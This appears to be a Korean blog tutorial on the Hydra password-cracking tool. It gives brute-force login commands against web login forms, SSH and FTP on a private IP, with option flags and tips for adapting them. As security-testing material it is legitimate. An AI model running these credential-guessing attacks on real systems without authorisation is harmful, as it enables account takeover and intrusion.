히드라는 지정된 대상에 반복적인 로그인 시도를 통해 이용자의 아이디와 비밀번호를 탈취할 수 있도록 하는 자동화 도구 입니다.
웹 로그인 시도
hydra -l Admin -P /dir/password.txt 192.168.0.2 http-post-form "/mgr/login.jsp:userid=^USER^&userpw=^PASS^&Login=Login:loginfail" -V -f
-V : 로그인 시도 계정 과 비밀번호를 화면에 디스플레이 시켜줍니다.
-f : 로그인을 성공하면 작업수행을 종료합니다.
-t : 쓰레드 개수를 지정하여 병렬작업을 수행합니다. 작업속도가 빨리집니다.
-s : 포트번호 지정 -s 80 (80번 http 포트 지정)
-l : 단일 아이디만 시도합니다. "admin"만 로그인 시도 원할 시 -l admin
-p: 단일 패스워드만 시도합니다.
-L: 목록화된 아이디를 전부 시도합니다. txt 파일에 기재된 아이디를 모두 시도합니다.
-P: 목록화된 패스워들 전부 시도합니다. txt 파일에 기재된 패스워드를 모두 시도합니다.
tip)
1. https인 경우 : http-post-form > https-post-form
2. get인 경우 : http-post-form > http-get-form
3. id,pw외에 다른 파라미터가 함께 요청되는 경우 (예시: token=aaaaaa&id=test&pw=123)
> token=aaaaaaa&userid=^USER^&userpw=^PASS^ 와 같이 함께 이어붙여서 명령 작성
SSH 로그인 시도
hydra -l root -P /dir/password.txt 192.168.0.2 ssh -V -f
tip)
1. SSH 포트 번호가 22번이 아닌 4242번인 경우 : hydra -l root -P /dir/password.txt -s 4242 192.168.0.2 ssh -V -f
FTP 로그인 시도
hydra -l root -P /dir/password.txt 192.168.0.2 FTP -V -f
tip)
1. FTP 포트 번호가 21번이 아닌 4242번인 경우 : hydra -l root -P /dir/password.txt -s 4242 192.168.0.2 FTP -V -f
'보안 도구 사용방법' 카테고리의 다른 글
| 무선 AP(WiFi) 침투 (1) | 2023.11.07 |
|---|---|
| BurpSuite의 HTTPS/HTTP/Localhost 프록시 종합 설정 (1) | 2020.03.15 |
| 무선WiFi(OTA)를 이용한 IoT 인증서 업로드 및 통신 (0) | 2020.02.06 |
| Mosquitto Broker를 이용한 MQTT 암호화 통신 방법 & OpenSSL 인증서 사용 방법 (0) | 2019.12.29 |
| CentOS OpenSSL 설치 (0) | 2019.12.22 |